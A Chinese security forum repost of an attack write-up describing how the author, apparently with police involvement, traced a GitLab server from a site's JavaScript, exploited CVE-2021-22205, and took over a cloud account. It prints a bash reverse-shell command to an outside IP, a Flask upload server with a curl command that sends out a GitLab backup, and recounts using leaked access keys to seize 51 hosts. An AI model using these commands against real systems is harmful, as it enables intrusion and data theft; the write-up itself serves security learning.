安全矩阵

 找回密码
 立即注册
搜索
查看: 669|回复: 0

记一次HC中因为JS拿下整个云!!!

[复制链接]

417

主题

417

帖子

2391

积分

金牌会员

Rank: 6Rank: 6

积分
2391
发表于 2023-8-14 22:26:19 | 显示全部楼层 |阅读模式
本帖最后由 ivi 于 2023-8-14 22:26 编辑

声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。

请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。



现在只对常读和星标的公众号才展示大图推送,建议大家把潇湘信安“设为星标”,否则可能看不到了!



0x00 前言

本次分享主要是分享一次HC中的思路,值得大家学习,服务器已经交给相关部门进行取证等也已经打包结A了



0x01 信息收集



首先给到一个资产是二维码,是一张sese图片里面带有约炮的app下载,扫码后得到如下结果



得到如下结果:https://www.target.com 后进行访问主站
注册成功后发现全是妹子(........),这个时候先别急,咱第一步先去看他调用的JS资源,随便点击一个资源然后刷新一下看他F12网络

这里首先我只能用当时留下的毫无关联的图片进行演示了,当时我看到的JS文件叫 "MyProfile"

0x02 JS断点调试
这个凭借个人感觉就是个关键信息(我的资料 - > 配置信息?),

所以凭借这些理由,我在XHR中锁定了"MyProfile"这个关键字进行JS断点

然后刷新进行调试,在漫长的调试过程中我发现在一个很奇怪的JS文件中调用了我的MyProfile字段,叫 /assets/index-xxxxxx.js

一般来说我就会去审计一下这个JS文件,结果发现好东西了
  1. bindgen: "git+http://123.123.123.123:1111/target2/a.git#0.0.14"
复制代码

0x03 新突破
我当时就立刻去访问了一下,发现竟然是一个gitlab!

找了一下历史漏洞,CVE-2021-22205 直接梭哈,成功拿到shell

由于是执行命令,所以写了shell反弹
  1. echo 'bash -i >& /dev/tcp/123.123.123.123/1111 0>&1' > /tmp/haha.sh
  2. chmod +x /tmp/haha.sh
  3. /bin/bash /tmp/haha.sh
复制代码

成功反弹shell

发现是ubunto的16.04,但是本地提权失败,找了SUID也没有办法,想尽了各种办法都没办法提权,打算放弃了。
所以接下来就是去寻找Git权限能做的操作,找了一个下午,最终找到了backups目录里下找到了一个backup的tar包,应该八成就是gitlab上的备份了。

Flask之取文件
但是问题来了,我怎么做到在我反弹shell中把文件拖出来了呢?scp等都试过了不行,于是乎我就写了个flask的上传页面让shell去curl一下把文件post上来(感觉这思路骚的)
我的服务器
  1. from flask import Flask,request
  2. import os

  3. app = Flask(__name__)

  4. @app.route('/upload',methods=['POST'])
  5. def upload_file():
  6.     file = request.files.get('file')
  7.     if file :
  8.         filename = file.filename
  9.         file.save(os.path.join(os.getcwd(),filename))
  10.         return f"File {filename} saved successfully"
  11.     else:
  12.         return "worry"


  13. if  __name__ == '__main__':
  14.     app.run(host='0.0.0.0',debug=True,port=5000)
复制代码

受控主机shell
  1. curl -X POST http://123.123.123.123:1111/upload -F file=@./a.gitlab_backup.tar
复制代码

0x04 云沦陷(泄露AK SK)
几个G,下载漫长的很呢!然后拖到本地后应该就是gitlab的备份了,(因为他备份文件名字中带有gitlab的版本号)要用到对应的gitlab的相应版本去搭建。
然后本地搭建导入备份后慢慢的寻找一些有用信息,后面然发现一个叫application.yaml的件,进行审计后泄露了ak和sk这开发倒是备份挺明白的,全部都写清清楚楚)。
这个时候行云管家一把梭哈,因为权限很大,接管整个云了,总共是51台主机都拿下了。

0x05 总结

思路就是 :打点 -> JS文件断点调试 ->新突破上shell-> 解决困难-> 发现新大陆(本地搭建)-> 接管云,最后全部打包好给了JF,也进行取证立A了,到此因为一个JS文件拿下整个云结束了,思路可以学习一波。
  1. 文章来源:先知社区(1201463046740633)
  2. 原文地址:[url]https://xz.aliyun.com/t/12698[/url]
复制代码




本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 15:56 , Processed in 0.015057 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表